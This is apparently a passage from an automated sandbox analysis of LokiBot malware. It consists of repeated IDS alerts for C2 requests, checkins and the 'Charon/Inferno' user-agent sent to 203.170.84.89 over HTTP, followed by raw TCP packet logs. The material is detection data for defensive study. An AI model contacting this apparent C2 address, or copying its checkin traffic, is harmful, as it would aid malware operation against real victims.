                                          02/22/21-19:13:38.688701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.4203.170.84.89
                                          02/22/21-19:13:38.688701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.4203.170.84.89
                                          02/22/21-19:13:38.688701TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.4203.170.84.89
                                          02/22/21-19:13:39.984082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.4203.170.84.89
                                          02/22/21-19:13:39.984082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.4203.170.84.89
                                          02/22/21-19:13:39.984082TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.4203.170.84.89
                                          02/22/21-19:13:41.300879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.4203.170.84.89
                                          02/22/21-19:13:41.300879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.4203.170.84.89
                                          02/22/21-19:13:41.300879TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.4203.170.84.89
                                          02/22/21-19:13:42.586767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.4203.170.84.89
                                          02/22/21-19:13:42.586767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.4203.170.84.89
                                          02/22/21-19:13:42.586767TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.4203.170.84.89
                                          02/22/21-19:13:43.872010TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.4203.170.84.89
                                          02/22/21-19:13:43.872010TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.4203.170.84.89
                                          02/22/21-19:13:43.872010TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.4203.170.84.89
                                          02/22/21-19:13:45.134992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.4203.170.84.89
                                          02/22/21-19:13:45.134992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.4203.170.84.89
                                          02/22/21-19:13:45.134992TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.4203.170.84.89
                                          02/22/21-19:13:46.448703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.4203.170.84.89
                                          02/22/21-19:13:46.448703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.4203.170.84.89
                                          02/22/21-19:13:46.448703TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:47.761299TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:49.047258TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:50.324886TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:51.622676TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:52.940189TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:54.217316TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:55.493778TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:56.763032TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:58.050742TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.4203.170.84.89
                                          02/22/21-19:13:59.321820TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:00.631942TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:01.922836TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:03.230296TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:04.508068TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:05.814223TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:07.112781TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:08.413653TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:09.712194TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:11.002003TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:12.313270TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:13.908883TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:15.437535TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:16.710648TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:18.024684TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:19.321868TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:20.599287TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:21.882521TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:23.176365TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:24.482440TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:25.733888TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:27.016301TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:28.298521TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:29.542203TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:30.810538TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:32.137483TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:33.411950TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:34.725026TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:36.028479TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:37.334442TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:38.623262TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:39.953346TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:41.267887TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:42.561340TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:43.857917TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:45.133832TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:46.440406TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.4203.170.84.89
                                          02/22/21-19:14:47.730697TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.4203.170.84.89
                                          02/22/21-19:14:47.730697TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.4203.170.84.89
                                          02/22/21-19:14:47.730697TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:49.051550TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:50.340811TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.4203.170.84.89
                                          02/22/21-19:14:51.621970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.4203.170.84.89
                                          02/22/21-19:14:51.621970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.4203.170.84.89
                                          02/22/21-19:14:51.621970TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.4203.170.84.89

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Feb 22, 2021 19:13:01.722322941 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.068474054 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.068581104 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.072160959 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.419821978 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.422183037 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.768070936 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.801673889 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.801837921 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.802093983 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.802150011 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:03.116241932 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:03.147840977 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:03.452878952 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:03.453000069 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:03.456110954 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:03.791208982 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:03.791301966 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.125984907 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.158847094 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.159040928 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.159228086 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.159281015 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.331841946 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.493936062 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.670717001 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.670828104 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.676480055 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.014862061 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:05.014952898 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.354441881 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:05.396814108 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:05.397056103 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:05.397253990 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.397555113 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.704830885 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.737412930 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.043128014 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.046210051 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:06.053559065 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:06.391633034 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.392352104 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:06.730252028 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.769673109 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.769746065 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.769833088 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:06.769897938 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:07.067527056 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:07.107938051 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:07.405133963 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:07.405369043 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:07.581440926 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:07.923216105 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:07.923393965 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:08.261207104 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:08.297547102 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:08.297693968 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:08.297844887 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:08.754415035 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:09.036272049 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:09.091958046 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:09.373982906 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:09.374150991 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:09.379899025 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:09.717824936 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:09.717972994 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.057297945 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.094573975 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.094821930 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.095177889 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.095268965 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.411180973 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.433692932 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.745512009 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.746390104 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.753897905 CET4975380192.168.2.4203.170.84.89
